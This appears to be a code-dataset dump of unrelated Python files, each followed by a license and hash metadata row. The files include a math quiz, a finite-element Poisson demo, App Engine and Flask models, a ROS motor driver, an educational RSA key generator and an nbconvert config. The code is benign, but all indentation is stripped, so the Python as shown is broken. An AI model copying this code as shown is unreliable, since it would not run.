elif x == 1:
myfunctions.number_1(width)
elif x == 2:
myfunctions.number_2(width)
elif x == 3:
myfunctions.number_3(width)
elif x == 4:
myfunctions.number_4(width)
elif x == 5:
myfunctions.number_5(width)
elif x == 6:
myfunctions.number_6(width)
elif x == 7:
myfunctions.number_7(width)
elif x == 8:
myfunctions.number_8(width)
elif x == 9:
myfunctions.number_9(width)
#Display operator
if op == 1:
op = "+"
myfunctions.plus(width)
addition += 1
elif op == 2:
op = "-"
myfunctions.minus(width)
subtraction += 1
elif op == 3:
op = "*"
myfunctions.multiply(width)
multiplication += 1
elif op == 4:
op = "/"
myfunctions.divide(width)
division += 1
#Display second number
if y == 0:
myfunctions.number_0(width)
elif y == 1:
myfunctions.number_1(width)
elif y == 2:
myfunctions.number_2(width)
elif y == 3:
myfunctions.number_3(width)
elif y == 4:
myfunctions.number_4(width)
elif y == 5:
myfunctions.number_5(width)
elif y == 6:
myfunctions.number_6(width)
elif y == 7:
myfunctions.number_7(width)
elif y == 8:
myfunctions.number_8(width)
elif y == 9:
myfunctions.number_9(width)
#Ask user for answer and check answer
if drill == "no":
z = int(input("= "))
if myfunctions.check_answer(x, y, z, op) == True:
print("Correct!")
tscore += 1
if op == "+":
addition_score += 1
if op == "-":
subtraction_score += 1
if op == "*":
multiplication_score += 1
if op == "/":
division_score += 1
else:
print("Sorry, that's not correct.")
elif drill == "yes":
while True:
z = int(input("= "))
if myfunctions.check_answer(x, y, z, op) == False:
print("Sorry, that's not correct.")
if op == "+":
addition_score += 1
if op == "-":
subtraction_score += 1
if op == "*":
multiplication_score += 1
if op == "/":
division_score += 1
continue
else:
print("Correct!")
break
#Display score
if drill == "no":
print("\nYou got %d out of %d correct!" %(tscore, qns))
for operator, count, score in zip(["addition", "subtraction", "multiplication", "division"], [addition, subtraction, multiplication, division], [addition_score, subtraction_score, multiplication_score, division_score]):
if count == 0:
print("\nNo %s problems presented" %(operator))
else:
print("\nTotal %s problems presented: %d" %(operator, count))
print("Correct %s problems: %d (%s)" %(operator, score, format(score/count, ".1%")))
elif drill == "yes":
for operator, count, score in zip(["addition", "subtraction", "multiplication", "division"], [addition, subtraction, multiplication, division], [addition_score, subtraction_score, multiplication_score, division_score]):
if score == 0:
praise = "(perfect!)"
else:
praise = ""
if count == 0:
print("\nNo %s problems presented" %(operator))
else:
print("\nTotal %s problems presented: %d" %(operator, count))
print("# of extra attempts needed: %d %s" %(score, praise))
| mit | -6,892,856,213,811,609,000 | 28.045198 | 223 | 0.511847 | false | 3.924723 | false | false | false |
FEniCS/dolfin | demo/undocumented/adaptive-poisson/python/demo_adaptive-poisson.py | 1 | 2889 | """This demo program solves Poisson's equation
- div grad u(x, y) = f(x, y)
on the unit square with source f given by
f(x, y) = exp(-100(x^2 + y^2))
and homogeneous Dirichlet boundary conditions.
Note that we use a simplified error indicator, ignoring
edge (jump) terms and the size of the interpolation constant.
"""
# Copyright (C) 2008 Rolv Erlend Bredesen
#
# This file is part of DOLFIN.
#
# DOLFIN is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# DOLFIN is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with DOLFIN. If not, see <http://www.gnu.org/licenses/>.
#
# Modified by Anders Logg 2008-2011
from __future__ import print_function
from dolfin import *
from numpy import array, sqrt
from math import pow
from six.moves import xrange as range
TOL = 5e-4 # Error tolerance
REFINE_RATIO = 0.50 # Refine 50 % of the cells in each iteration
MAX_ITER = 20 # Maximal number of iterations
# Create initial mesh
mesh = UnitSquareMesh(4, 4)
source_str = "exp(-100.0*(pow(x[0], 2) + pow(x[1], 2)))"
source = eval("lambda x: " + source_str)
# Adaptive algorithm
for level in range(MAX_ITER):
# Define variational problem
V = FunctionSpace(mesh, "CG", 1)
v = TestFunction(V)
u = TrialFunction(V)
f = Expression(source_str, degree=2)
a = dot(grad(v), grad(u))*dx
L = v*f*dx
# Define boundary condition
u0 = Constant(0.0)
bc = DirichletBC(V, u0, DomainBoundary())
# Compute solution
u = Function(V)
solve(a == L, u, bc)
# Compute error indicators
h = array([c.h() for c in cells(mesh)])
K = array([c.volume() for c in cells(mesh)])
R = array([abs(source([c.midpoint().x(), c.midpoint().y()])) for c in cells(mesh)])
gamma = h*R*sqrt(K)
# Compute error estimate
E = sum([g*g for g in gamma])
E = sqrt(MPI.sum(mesh.mpi_comm(), E))
print("Level %d: E = %g (TOL = %g)" % (level, E, TOL))
# Check convergence
if E < TOL:
info("Success, solution converged after %d iterations" % level)
break
# Mark cells for refinement
cell_markers = MeshFunction("bool", mesh, mesh.topology().dim())
gamma_0 = sorted(gamma, reverse=True)[int(len(gamma)*REFINE_RATIO)]
gamma_0 = MPI.max(mesh.mpi_comm(), gamma_0)
for c in cells(mesh):
cell_markers[c] = gamma[c.index()] > gamma_0
# Refine mesh
mesh = refine(mesh, cell_markers)
# Plot mesh
plot(mesh)
| lgpl-3.0 | -1,866,448,215,433,288,200 | 29.410526 | 87 | 0.661821 | false | 3.324511 | false | false | false |
theintencity/flash-videoio | examples/django-apps/project/experts/models.py | 1 | 3541 | import datetime
from google.appengine.api import users
from google.appengine.ext import db
class User(db.Model):
name = db.StringProperty('Full Name')
account = db.UserProperty()
phone_number = db.PhoneNumberProperty('Phone Number')
address = db.PostalAddressProperty('Postal Address')
website = db.StringProperty('Homepage URL')
description = db.TextProperty('Brief Biography')
rating = db.FloatProperty(default=0.0)
rating_count = db.IntegerProperty(default=0)
tags = db.StringListProperty('Expertise, one per line', default=None)
availability = db.TextProperty('Availability', default='Available by appointment on weekdays in PST timezone')
has_chat = db.BooleanProperty('Use Google Chat', default=False)
def email(self):
result = self.account.nickname() if self.account else ''
return (result + '@gmail.com') if result and '@' not in result else result
def get_current_user():
account = users.get_current_user()
if account:
user = db.GqlQuery('SELECT * FROM User WHERE account = :1', account).get()
if not user:
user = User(name='', account=account)
user.put()
user.is_active = True
user.is_staff = users.is_current_user_admin()
else:
user = User()
user.is_active = False
return user
class Tag(db.Model):
name = db.StringProperty(required=True)
count = db.IntegerProperty(default=1)
class Event(db.Model):
subject = db.StringProperty()
description = db.TextProperty()
owner = db.StringProperty()
visitor = db.StringProperty()
start_time = db.DateTimeProperty()
end_time = db.DateTimeProperty()
created_on = db.DateTimeProperty(auto_now_add=True)
class Review(db.Model):
event = db.ReferenceProperty(Event, collection_name='event_set') # TODO make required=True
for_user = db.ReferenceProperty(User, required=True, collection_name='for_user_set')
by_user = db.ReferenceProperty(User, required=True, collection_name='by_user_set')
rating = db.IntegerProperty(default=3)
description = db.TextProperty()
modified_on = db.DateTimeProperty(auto_now=True)
class ClientStream(db.Model):
clientId = db.StringProperty(required=True)
visitor = db.StringProperty()
name = db.StringProperty(default='Anonymous')
publish = db.StringProperty(required=True)
play = db.StringProperty()
is_owner = db.BooleanProperty(default=False)
owner = db.StringProperty(required=True)
modified_on = db.DateTimeProperty(auto_now=True)
created_on = db.DateTimeProperty(auto_now_add=True)
def __repr__(self):
return '<ClientStream clientId=%r visitor=%r name=%r is_owner=%r owner=%r />'%(self.clientId, self.visitor, self.name, self.is_owner, self.owner)
def get_object(self, full=True):
if full:
return {'clientId': self.clientId, 'name': self.name, 'url': self.publish}
else:
return {'clientId': self.clientId}
class OfflineMessage(db.Model):
sender = db.StringProperty()
senderName = db.StringProperty()
receiver = db.StringProperty()
text = db.StringProperty(multiline=True)
created_on = db.DateTimeProperty(auto_now_add=True)
def __repr__(self):
return '<OfflineMessage sender=%r senderName=%r receiver=%r text=%r />'%(self.sender, self.senderName, self.receiver, self.text)
def get_object(self):
return {'senderName': self.senderName, 'text': self.text}
| lgpl-3.0 | -634,891,817,617,899,600 | 36.680851 | 153 | 0.672409 | false | 3.78312 | false | false | false |
thesilencelies/SonnetConvs | InceptionModule.py | 1 | 1790 | #implimentation of the standard inceptionnet v3 inception module in sonnet
import tensorflow as tf
import sonnet as snt
class InceptionModule(snt.AbstractModule):
def __init__(self, output_channels, name="inception_module"):
super(InceptionModule, self).__init__(name=name)
self._output_channels = output_channels
def _build(self, inputs):
reshapeFlat = lambda x : tf.contrib.layers.flatten(x)
conv1d5 = snt.Conv2D(output_channels=self._output_channels, kernel_shape=1,
stride=1,name="inception5input")
conv1d3 = snt.Conv2D(output_channels=self._output_channels, kernel_shape=1,
stride=1,name="inception3input")
conv1dm = snt.Conv2D(output_channels=self._output_channels, kernel_shape=1,
stride=1,name="inceptionpoolinput")
conv1d1 = snt.Conv2D(output_channels=self._output_channels, kernel_shape=1,
stride=1,name="inception1channel")
conv3d5a = snt.Conv2D(output_channels=self._output_channels, kernel_shape=3,
stride=1,name="inception5stage1")
conv3d5b = snt.Conv2D(output_channels=self._output_channels, kernel_shape=3,
stride=1,name="inception5stage2")
conv3d3 = snt.Conv2D(output_channels=self._output_channels, kernel_shape=3,
stride=1,name="inception3channel")
maxpool = lambda x : tf.nn.max_pool(x, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
return tf.concat([reshapeFlat(conv3d5b(conv3d5a(conv1d5(inputs)))),
reshapeFlat(conv3d3(conv1d3(inputs))),
reshapeFlat(maxpool(conv1dm(inputs))),
reshapeFlat(conv1d1(inputs))],1) # then connect it.
| apache-2.0 | -6,797,985,732,095,887,000 | 43.75 | 81 | 0.632961 | false | 3.429119 | false | false | false |
YutingZhang/lmdis-rep | exp-ae-aflw-30.py | 1 | 2231 | import tensorflow as tf
import os
import sys
from copy import copy
from model.pipeline import Pipeline
from tensorflow.python import debug as tf_debug
if __name__ == "__main__":
num_keypoints = 30
patch_feature_dim = 8
decoding_levels = 5
kp_transform_loss = 1e4
recon_weight = 0.001
learning_rate=0.01
keypoint_separation_bandwidth=0.04
keypoint_separation_loss_weight = 10.0
opt = {
"optimizer": "Adam",
"data_name": "aflw_80x80",
"recon_name": "gaussian_fixedvar_in_01",
"encoder_name": "general_80x80",
"decoder_name": "general_80x80",
"latent_dim": num_keypoints*2+(num_keypoints+1)*patch_feature_dim,
"train_color_jittering": True,
"train_random_mirroring": False,
"train_batch_size": 8,
"train_shuffle_capacity": 1000,
"learning_rate": learning_rate,
"max_epochs": 2000,
"weight_decay": 1e-6,
"test_steps": 5000,
"test_limit": 200,
"recon_weight": recon_weight,
}
opt["encoder_options"] = {
"keypoint_num": num_keypoints,
"patch_feature_dim": patch_feature_dim,
"ae_recon_type": opt["recon_name"],
"keypoint_concentration_loss_weight": 100.,
"keypoint_axis_balancing_loss_weight": 200.,
"keypoint_separation_loss_weight": keypoint_separation_loss_weight,
"keypoint_separation_bandwidth": keypoint_separation_bandwidth,
"keypoint_transform_loss_weight": kp_transform_loss,
"keypoint_decoding_heatmap_levels": decoding_levels,
"keypoint_decoding_heatmap_level_base": 0.5**(1/2),
"image_channels": 3,
}
opt["decoder_options"] = copy(opt["encoder_options"])
# -------------------------------------
model_dir = os.path.join("results/aflw_30")
checkpoint_dir = 'pretrained_results'
checkpoint_filename = 'celeba_30/model/snapshot_step_205317'
vp = Pipeline(None, opt, model_dir=model_dir)
print(vp.opt)
with vp.graph.as_default():
sess = vp.create_session()
vp.run_full_train_from_checkpoint(sess, checkpoint_dir = checkpoint_dir, checkpoint_filename=checkpoint_filename)
vp.run_full_test(sess)
| apache-2.0 | -6,170,820,400,219,724,000 | 32.298507 | 121 | 0.618557 | false | 3.390578 | false | true | false |
q14035/pimouse_ros | scripts/motors2.py | 1 | 2178 | #!/usr/bin/env python
#encoding: utf8
import sys, rospy, math
from pimouse_ros.msg import MotorFreqs
from geometry_msgs.msg import Twist
from std_srvs.srv import Trigger, TriggerResponse
class Motor():
def __init__(self):
if not self.set_power(False): sys.exit(1)
rospy.on_shutdown(self.set_power)
self.sub_raw = rospy.Subscriber('motor_raw', MotorFreqs, self.callback_raw_freq)
self.sub_cmd_vel = rospy.Subscriber('cmd_vel', Twist, self.callback_cmd_vel)
self.srv_on = rospy.Service('motor_on', Trigger, self.callback_on)
self.srv_off = rospy.Service('motor_off', Trigger, self.callback_off)
self.last_time = rospy.Time.now()
self.using_cmd_vel = False
def set_power(self, onoff = False):
en = "/dev/rtmotoren0"
try:
with open(en, 'w') as f:
f.write("1\n" if onoff else "0\n")
self.is_on = onoff
return True
except:
rospy.logerr("cannot write to " + en)
return False
def set_raw_freq(self, left_hz, right_hz):
if not self.is_on:
rospy.logerr("not enpowered")
return
try:
with open("/dev/rtmotor_raw_l0", 'w') as lf, open("/dev/rtmotor_raw_r0", 'w') as rf:
lf.write(str(int(round(left_hz))) + "\n")
rf.write(str(int(round(right_hz))) + "\n")
except:
rospy.logerr("cannot write to rtmotor_raw_*")
def callback_raw_freq(self, message):
self.set_raw_freq(message.left_hz, message.right_hz)
def callback_cmd_vel(self, message):
forward_hz = 80000.0*message.linear.x/(9*math.pi)
rot_hz = 400.0*message.angular.z/math.pi
self.set_raw_freq(forward_hz-rot_hz, forward_hz+rot_hz)
self.using_cmd_vel = True
self.last_time = rospy.Time.now()
def onoff_response(self, onoff):
d = TriggerResponse()
d.success = self.set_power(onoff)
d.message = "ON" if self.is_on else "OFF"
return d
def callback_on(self, message): return self.onoff_response(True)
def callback_off(self, message): return self.onoff_response(False)
if __name__ == '__main__':
rospy.init_node('motors')
m = Motor()
rate = rospy.Rate(10)
while not rospy.is_shutdown():
if m.using_cmd_vel and rospy.Time.now().to_sec() - m.last_time.to_sec() >= 1.0:
m.set_raw_freq(0, 0)
m.using_cmd_vel = False
rate.sleep()
| gpl-3.0 | 1,233,239,839,957,850,400 | 29.676056 | 87 | 0.674472 | false | 2.574468 | false | false | false |
antoinecarme/pyaf | tests/perf/test_ozone_debug_perf.py | 1 | 1566 | import pandas as pd
import numpy as np
# from memory_profiler import profile
# from memprof import *
import pyaf.ForecastEngine as autof
import pyaf.Bench.TS_datasets as tsds
#get_ipython().magic('matplotlib inline')
# @memprof
def test_ozone_debug_perf():
b1 = tsds.load_ozone()
df = b1.mPastData
# df.tail(10)
# df[:-10].tail()
# df[:-10:-1]
# df.describe()
lEngine = autof.cForecastEngine()
lEngine
H = b1.mHorizon;
lEngine.mOptions.mDebugPerformance = True;
lEngine.mOptions.mEnableCycles = False;
lEngine.mOptions.mEnableTimeBasedTrends = False;
lEngine.mOptions.mEnableARModels = False;
lEngine.train(df , b1.mTimeVar , b1.mSignalVar, H);
lEngine.getModelInfo();
print(lEngine.mSignalDecomposition.mTrPerfDetails.head());
lEngine.mSignalDecomposition.mBestModel.mTimeInfo.mResolution
lEngine.standardPlots("outputs/my_ozone");
dfapp_in = df.copy();
dfapp_in.tail()
dfapp_out = lEngine.forecast(dfapp_in, H);
#dfapp_out.to_csv("outputs/ozone_apply_out.csv")
dfapp_out.tail(2 * H)
print("Forecast Columns " , dfapp_out.columns);
Forecast_DF = dfapp_out[[b1.mTimeVar , b1.mSignalVar, b1.mSignalVar + '_Forecast']]
print(Forecast_DF.info())
print("Forecasts\n" , Forecast_DF.tail(H).values);
print("\n\n<ModelInfo>")
print(lEngine.to_json());
print("</ModelInfo>\n\n")
print("\n\n<Forecast>")
print(Forecast_DF.tail(2*H).to_json(date_format='iso'))
print("</Forecast>\n\n")
test_ozone_debug_perf();
| bsd-3-clause | 6,925,707,315,643,373,000 | 25.1 | 87 | 0.664112 | false | 2.89464 | false | false | false |
assamite/TwatBot | tweets/reasoning.py | 1 | 4674 | '''
.. py:module:: reasoning
:platform: Unix
Reasoning object for the tweets.
'''
import logging
import traceback
logger = logging.getLogger('tweets.default')
class Reasoning():
'''Reasoning for the tweets.
Class is used to hold information about the tweet's construction, and contains
few utility functions for convenience.
After the tweet has been constructed, the class should hold at least
following attributes:
* color_code (str or unicode): color of the tweet in html-format.
* color_name (str or unicode: name constructed for the color code
* tweet (str or unicode): text of the tweet
* tweeted (bool): Was the constructed tweet send to twitter
* retweet (bool): is the tweet a retweet
* retweet_url (str or unicode): URL for the retweet (if any)
* original_tweet (str or unicode): Original tweet if this is a retweet
* muse: class instance of the used Muse
* context: class instance of the used Context
* color_semantics: class instance of the used ColorSemantics.
* values (dict): dictionary of the appreciation values generated during the tweet's construction.
'''
def __init__(self, **kwargs):
self.color_code = ""
self.color_name = ""
self.tweet = ""
self.tweeted = False
self.retweet = False
self.retweet_url = ""
self.original_tweet = ""
self.muse = None
self.context = None
self.color_semantics = None
self.muse_classname = ""
self.color_semantics_classname = ""
self.context_classname = ""
self.values = {}
self.media = None
self.appreciation = 0.0
for k, v in kwargs.items():
setattr(self, k, v)
def __repr__(self):
ret = ""
for k, v in self.__dict__.items():
ret = ret + k + ": " + str(v) + "\n"
return ret
def set_attr(self, name, value):
'''Define new or change old attribute value.
Caller should take care of the possible conflicts when changing existing
attribute values.
:param name: Name of the attribute
:type name: str
:param value: New attribute value
:type value: Object
'''
setattr(self, name, value)
if name == 'muse':
setattr(self, 'muse_classname', value.__class__.__name__)
if name == 'context':
setattr(self, 'context_classname', value.__class__.__name__)
if name == 'color_semantics':
setattr(self, 'color_semantics_classname', value.__class__.__name__)
def set_attrs(self, mappings):
'''Define new or change old attribute values in a patch.
Caller should take care of the possible conflicts when changing existing
attribute values.
:param mappings: Attribute mappings
:type mappings: dict
'''
for k, v in mappings.items():
self.set_attr(k, v)
def save(self):
'''Save tweet to database.
:returns: bool -- True is the save was made, False if not exceptions happened during the save
'''
from models import EveryColorBotTweet, Tweet, ReTweet
if self.tweet == "":
logger.info("Saving called for empty tweet. Skipping.")
return False
try:
twinst = Tweet(message = self.tweet, value = self.appreciation,\
muse = self.muse_classname,\
context = self.context_classname,\
color_code = self.color_code,\
color_name = self.color_name)
twinst.save()
if self.retweet:
screen_name = self.screen_name
if screen_name == 'everycolorbot':
inst = EveryColorBotTweet.objects.get_or_none(url = self.retweet_url)
if inst:
inst.tweeted = True
inst.save()
reinst = ReTweet(tweet_url = self.retweet_url,\
screen_name = screen_name, tweet = twinst)
reinst.save()
logger.info("Tweet saved to database: {}".format(self.tweet))
except Exception:
e = traceback.format_exc()
logger.error("Could not save tweet to database, because of error: {}".format(e))
return False
return True
| mit | 2,346,785,769,061,129,700 | 34.409091 | 104 | 0.545999 | false | 4.485605 | false | false | false |
swarna-k/MyDiary | app/models.py | 1 | 1566 | from app import db
from werkzeug import generate_password_hash, check_password_hash
class User(db.Model):
id = db.Column(db.Integer, primary_key = True)
firstname = db.Column(db.String(100))
lastname = db.Column(db.String(100))
email = db.Column(db.String(120), unique=True)
pwdhash = db.Column(db.String(54))
entries = db.relationship('Entry', backref='author', lazy='dynamic')
reminders = db.relationship('Reminder', backref='author', lazy='dynamic')
def __init__(self, firstname, lastname, email, password):
self.firstname = firstname.title()
self.lastname = lastname.title()
self.email = email.lower()
self.set_password(password)
def set_password(self, password):
self.pwdhash = generate_password_hash(password)
def check_password(self, password):
return check_password_hash(self.pwdhash, password)
def __repr__(self):
return '<User %r>' % (self.firstname)
class Entry(db.Model):
id = db.Column(db.Integer, primary_key = True)
name = db.Column(db.String(100))
body = db.Column(db.Text)
timestamp = db.Column(db.DateTime)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
def __repr__(self):
return '<Entry %r>' % (self.body)
class Reminder(db.Model):
id = db.Column(db.Integer, primary_key = True)
when = db.Column(db.DateTime)
body = db.Column(db.Text)
timestamp = db.Column(db.DateTime)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
def __repr__(self):
return '<Reminder %r>' % (self.body)
| bsd-3-clause | 1,779,423,689,113,203,200 | 29.705882 | 75 | 0.65645 | false | 3.303797 | false | false | false |
omarkadry/rsa_algorithm | RSA.py | 1 | 5283 | #!/usr/bin/python
#Algoriths Project Part 1a
#Omar Kadry
#CMSC 441
#Dr. Marron
#IMPLEMENTATION NOTES
#Python's built in pow function uses Binary Exponentiation and reducing modulo n to compute modular
#exponentiation. This is the same algorithm as MODULAR-EXPONENTIATION(a,b,n) as used in the text
#For large number mutliplication Python uses Karatsuba's method as discusssed in class
#Encrypted using modulus of 2048 bits
#Message Encrypted with Private Key =
#549335432742725778252187541104443188156944438806863457411666058499398272260706426139538267238120336092084632198514701950566203930065985324580534295693425367212921830205866755643739579288731322322946366466576799796974416100601383412159359169170613839877922173796152893918170136479717941167924064476336789776106984955596378941959676443995574307557232184168653454435294749983774161045180981596162964832360087083009219442813368249004389009182055455524458934480504555947413171214222377987666294266525295763559510397442092718659910879958017424466509571661222667744582625838716048450963735149873220637697801126262181088272
#n = 2372112898706524098783243835606671423055801883554227254030743710505202283932667011668956139382911768876035660572032080308562219037288900124052316286309512108625859836958747947762092799677854295671866288119481685786760570903533545560435541052326183788082279075073373227880942687435505490994525413101260845901748238215480998501123816262694263026377952163660645333809073068011604416987281948409408692393376191358516220341631487894075618891499412550098438456600441042870219500840853342452184082591601805986792948794525871595912715813197678328912976549353915846570322821639411967156886422360861220109970600152445030560129
#public key e = 1977623957817836883919633554596704012915783900570809149483856078010145425692545878452812725561415102822918517227924598205956910940350062144643427460974258169951841328548095289498955467345087157904399185646775059360160689508306113707875539862799501027047474838298216312008836598256088581250099042957573530717659415412893768343977899980494510094815770699761034869232518446869348437561961594909995056962983992121384916099020899755884457999313029602625570516932900789485878260172195900227111449085645227576679740196755445527867666825244974372425673866849078226602801561771006724501838806746943672716086807419555183315337s
import sys
import os
import random
import math
import argparse
s = 5 #s for miller-rabin test
#Constants to make code more readable
PRIME = 1
COMPOSITE = 2
#Generates Random Psuedoprimes of size bits
#validates with miller rabin test
def generate_rand(size):
n = random.SystemRandom().getrandbits(size)
while(n == 1 or n == 0):
n = random.SystemRandom().getrandbits(size)
while True:
if n % 2 == 0:
n = n + 1
if(miller_rabin(n,s) == PRIME):
return n
n = n + 2
#Miller-Rabin test
def miller_rabin(n,s):
for j in range(0,s):
a = random.SystemRandom().randint(1, n-1)
if(witness(a,n)):
return COMPOSITE
return PRIME
#Witness function for miller-rabin
def witness(a,n):
t,u = calc_t_u(n-1)
x = []
x.append(modular_exponentiation(a,u,n))
for i in range(1,t+1):
x.append(modular_exponentiation(x[i-1],2,n))
if (x[i] == 1) and (x[i-1] != 1) and (x[i-1] != n-1):
return True
if x[t] != 1:
return True
return False
def modular_exponentiation(a,b,n):
a = int(a)
b = int(b)
n = int(n)
return pow(a,b,n)
#Calculates t and u for the witness function
def calc_t_u(n):
t = 0
u = n
while (u % 2 == 0):
u = u / 2
t+=1
return t,u
#Gets a value for e
#Generates a random value and checks it's relatively prime to phi_n
def get_e(phi_n):
e = random.SystemRandom().randint(3, phi_n)
while euclid(phi_n,e) != 1:
e = random.SystemRandom().randint(3,phi_n)
return e
#Euclid and extended euclid are iterative due to recursion depth errors
#being found when the modulus size was >= 1024 bits
#Euclids algorithm
def euclid(a,b):
if a < b:
a, b = b, a
while b != 0:
a, b = b, a % b
return a
#Extended Euclid's Algorithm
def extend_euclid(a,b):
x,y, u,v = 0,1, 1,0
while a != 0:
q, r = b//a, b%a
m, n = x-u*q, y-v*q
b,a, x,y, u,v = a,r, u,v, m,n
gcd = b
return gcd, x, y
def get_mult_inverse(e, phi_n):
a,b,n = e,1,phi_n
d,_x,_y = extend_euclid(a,n)
if(d % b == 0):
return _x % n
else:
return -1
def msg_to_int(m):
x = 0
for c in m:
x = x << 8
x = x ^ ord(c)
return x
if __name__ == '__main__':
private_key = 0
public_key = 0
parser = argparse.ArgumentParser(description="Generates an RSA public and private key")
parser.add_argument("-s", "--size", type=int,
help="Size in bits of RSA Key to Generate", required=True)
parser.add_argument("-m", "--message", type=str, help="A Message to Encrypt")
args = parser.parse_args()
modulus_size = args.size
p = generate_rand(modulus_size//2)
q = generate_rand(modulus_size//2)
while(p == q):
q = generate_rand(modulus_size//2)
n = p * q
phi_n = (p - 1) * (q - 1)
e = get_e(phi_n)
d = int(get_mult_inverse(e, phi_n))
print "N = \n", n, '\n'
print "Private Key d = \n", int(d), '\n'
print "Public Key e = \n", int(e), '\n'
if(args.message):
m = args.message
"Encrypting: %s" % m
print "\"",m,"\" encrypted with the private key is\n",
m = msg_to_int(m)
p = modular_exponentiation(m,d,n)
print p
| mit | 2,305,337,433,324,493,600 | 33.305195 | 633 | 0.769071 | false | 2.381876 | false | false | false |
mprat/learningjulia | nbconvert_config.py | 1 | 7416 | from nbconvert.preprocessors import ExecutePreprocessor, Preprocessor
import numpy as np
def jekyllurl(path):
"""
Take the filepath of an image output by the ExportOutputProcessor
and convert it into a URL we can use with Jekyll
"""
return path.replace("../..", "")
def svg_filter(svg_xml):
"""
Remove the DOCTYPE and XML version lines from
the inline XML SVG
"""
svgstr = "".join(svg_xml)
start_index = svgstr.index("<svg")
end_index = svgstr.index("</svg>")
return svgstr[start_index:end_index + 6]
def var_def_to_var_list(var_def):
if 'linspace' in var_def:
v = var_def.replace("linspace(", "")
v = v.replace(")", "")
start, stop, num = v.split(",")
return np.linspace(
float(start.strip()),
float(stop.strip()),
float(num.strip()))
elif '[' in var_def and ']' in var_def:
v = var_def.replace("[", "")
v = v.replace("]", "")
v = v.split(",")
return [x.strip() for x in v]
else:
raise TypeError("not implemented for {}".format(var_def))
class ExecuteWithInteractPreprocessor(ExecutePreprocessor):
def preprocess_cell(self, cell, resources, cell_index):
if cell.cell_type != 'code':
return cell, resources
if "@manipulate" in cell.source:
original_source = cell.source
cell_manipulate = cell.copy()
cell_source = original_source.split("\n")
cell_manipulate.source = "\n".join([cell_source[0], cell_source[-1]])
manipulate_output = self.run_cell(cell_manipulate)
outs = []
outs.extend(manipulate_output)
main_source = "\n".join(cell_source[1:-1])
var_def = cell_source[0].replace("@manipulate", "")
var_def = var_def.replace("for", "").strip().split("=")
var_name, var_list = var_def
# currently this only works for a single for loop
# turn all the variables into a loop
all_vars = var_def_to_var_list(var_list)
for next_var in all_vars:
var_defs = "{}={}".format(var_name, next_var)
cell_copy = cell.copy()
cell_copy.source = "\n".join([var_defs, main_source.strip()])
outputs = self.run_cell(cell_copy)
outs.extend(outputs)
cell.source = original_source
cell.outputs = outs
# fix the outputs
# probably better done at the postprocessing step
# import ipdb; ipdb.set_trace()
# raise TypeError("stopping")
else:
outputs = self.run_cell(cell)
cell.outputs = outputs
return cell, resources
# if 'Interact' in cell.outputs[0]['data']['text/plain']:
# there should be a widget here
class RemoveInteractJsShimPreprocessor(Preprocessor):
def preprocess(self, nb, resources):
"""
make sure the widgets resources get put into the resources
"""
if 'widgets' in nb['metadata'].keys():
resources['metadata']['widgets'] = nb['metadata']['widgets']
return super(RemoveInteractJsShimPreprocessor, self).preprocess(nb, resources)
def preprocess_cell(self, cell, resources, cell_index):
"""
remove any outputs that have interact-js-shim
"""
if 'outputs' in cell:
outputs = cell['outputs']
new_outputs = []
for output in outputs:
new_output = output.copy()
if "data" in output.keys():
data_output = output["data"]
new_data_output = data_output.copy()
if 'text/html' in data_output.keys():
text_html = data_output['text/html']
if text_html.startswith('<div id=\"interact-js-shim\">'):
start_index = text_html.find('<div id=\"interact-js-shim\">')
end_index = text_html.find('</div>')
new_html = ""
if start_index > 0:
new_html += text_html[0:start_index]
if end_index + 6 < len(text_html):
new_html += text_html[end_index+6:]
new_html = new_html.strip()
if len(new_html) > 0:
new_data_output['text/html'] = new_html
else:
del new_data_output['text/html']
else:
new_data_output['text/html'] = text_html
if len(new_data_output.keys()) > 0:
new_output['data'] = new_data_output
else:
del new_output['data']
if 'data' in new_output:
new_outputs.append(new_output)
else:
new_outputs.append(new_output)
cell['outputs'] = new_outputs
return cell, resources
class InsertWidgetsPreprocessor(Preprocessor):
def preprocess_cell(self, cell, resources, cell_index):
"""
if the cell is a cell with @manipulate, add the appropriate
widget script into the output
"""
if cell.cell_type != 'code':
return cell, resources
if "@manipulate" in cell.source:
widget_state = resources['metadata']['widgets']['application/vnd.jupyter.widget-state+json']['state']
interact_options = cell.outputs[0]['data']['text/plain']
start_index = interact_options.find('"')
model_name = interact_options[start_index + 1:]
next_index = model_name.find('"')
model_name = model_name[:next_index]
# match the widget based on the descriptions
matched_model_id = None
for model_id in widget_state.keys():
if widget_state[model_id]['state']['description'] == model_name:
matched_model_id = model_id
break
# construct the script tag
script_tag = '<script type="application/vnd.jupyter.widget-view+json">{"model_id": "' + matched_model_id + '"}</script>'
cell.outputs[0]['data']['text/html'] = script_tag
return cell, resources
c = get_config()
c.NbConvertApp.export_format = 'html'
c.NbConvertApp.output_files_dir = '../../assets/imgs/{notebook_name}'
c.HTMLExporter.preprocessors = [
'nbconvert.preprocessors.ExecutePreprocessor',
# ExecuteWithInteractPreprocessor,
'nbconvert.preprocessors.coalesce_streams',
'nbconvert.preprocessors.ExtractOutputPreprocessor',
RemoveInteractJsShimPreprocessor,
InsertWidgetsPreprocessor]
c.HTMLExporter.template_file = 'notebooks/jekyll.tpl'
c.HTMLExporter.filters = {"jekyllimgurl": jekyllurl, "svg_filter": svg_filter}
# if there's an error in one of the cells let the execution keep going
c.ExecutePreprocessor.allow_errors = True
# disable the timeout
c.ExecutePreprocessor.timeout = -1
c.ExecutePreprocessor.iopub_timeout = 10
# write the final HTML files into the _include/notebooks directory
c.FilesWriter.build_directory = "_includes/notebooks/"
| mit | -4,977,311,403,519,195,000 | 38.238095 | 132 | 0.551106 | false | 4.175676 | false | false | false |
KmolYuan/pyslvs | test/test_core.py | 1 | 3764 | # -*- coding: utf-8 -*-
"""Pyslvs core module test."""
__author__ = "Yuan Chang"
__copyright__ = "Copyright (C) 2016-2021"
__license__ = "AGPL"
__email__ = "[email protected]"
from math import sqrt, radians
from pyslvs import (
Coord, SolverSystem, pxy, ppp, plap, pllp, plpp, palp, expr_solving,
